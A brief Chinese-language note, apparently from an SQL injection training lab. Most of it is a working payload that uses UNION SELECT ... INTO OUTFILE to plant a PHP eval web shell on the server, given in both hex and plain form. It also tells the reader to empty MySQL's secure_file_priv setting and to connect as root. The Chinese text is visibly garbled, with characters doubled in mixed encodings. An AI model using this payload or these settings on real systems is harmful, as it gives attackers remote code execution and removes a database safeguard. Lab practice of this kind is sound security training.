這個(gè)關(guān)卡環(huán)境問題可能導(dǎo)致無法寫文件
1.修改mysql的my.ini文件,增加如下,這個(gè)是用于配置outfile寫權(quán)限的目錄
secure_file_priv =
2.請(qǐng)使用root連接數(shù)據(jù)庫(kù)
最后的payload
?id=1')) union select 1,0x3c3f7068706576616c28245f504f53545b277368656c6c275d293f3e,2 into outfile "D:\\1.php" -- +
?id=1')) union select 1,"<?php eval($_POST['shell'])?>",2 into outfile "D:\\1.php" -- +
這里可以用16進(jìn)制,也可以使用普通字符串
16進(jìn)制和字符串互轉(zhuǎn)工具 ox2str